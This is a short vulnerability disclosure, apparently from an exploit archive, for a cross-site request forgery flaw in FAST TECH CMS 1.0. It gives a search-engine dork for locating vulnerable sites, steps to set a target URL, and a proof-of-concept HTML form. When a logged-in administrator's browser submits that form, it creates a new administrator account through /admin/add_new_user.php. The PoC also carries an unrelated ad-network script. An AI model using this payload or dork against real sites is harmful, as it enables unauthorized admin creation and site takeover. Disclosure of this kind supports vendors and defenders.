Headline
FAST TECH CMS 1.0 Cross Site Request Forgery
FAST TECH CMS version 1.0 suffers from a cross site request forgery vulnerability.
====================================================================================================================================
| # Title : FAST TECH CMS v1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |
| # Vendor : http://www.fasttechtechnologies.in/ |
| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 5.
[+] Set the target site link Save changes and apply .
[+] infected file : /admin/add_new_user.php
[+] save code as poc.html .
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://www.w3.org/2005/10/profile">
<script data-ad-client="ca-pub-6966557515756083" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<form action="https://127.0.0.1/repairthikanacom/admin/add_new_user.php" method="post" name="newuserform" enctype="multipart/form-data">
<div class="form-group">
<label>Name</label>
<input type="text" class="form-control" id="name" name="name" placeholder="Enter Name …" required>
</div>
<div class="form-group">
<label>User Name</label>
<input type="text" class="form-control" id="username" name="username" placeholder="Enter User Name …" required>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required>
</div>
<div class="form-group">
<label>Confirm Password</label>
<input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required>
</div>
<div class="form-group">
<label>User Type</label>
<select class="form-control" id="usertype" name="usertype" required>
<option>Select Type</option>
<option value="A">Administrator</option>
<option value="R">Retail</option>
</select>
</div>
<div class="form-group">
<label>Email-Id</label>
<input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required>
</div>
<div class="box-footer">
<button type="submit" class="btn btn-primary" name="submit">Submit</button>
</div>
</form>
</div>
</div>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 9aylasdjroot.dzLiquidWormHussin-X*D4NB4R *ViRuS_Ra3cH yasMouh CraCkEr |
=======================================================================================================================================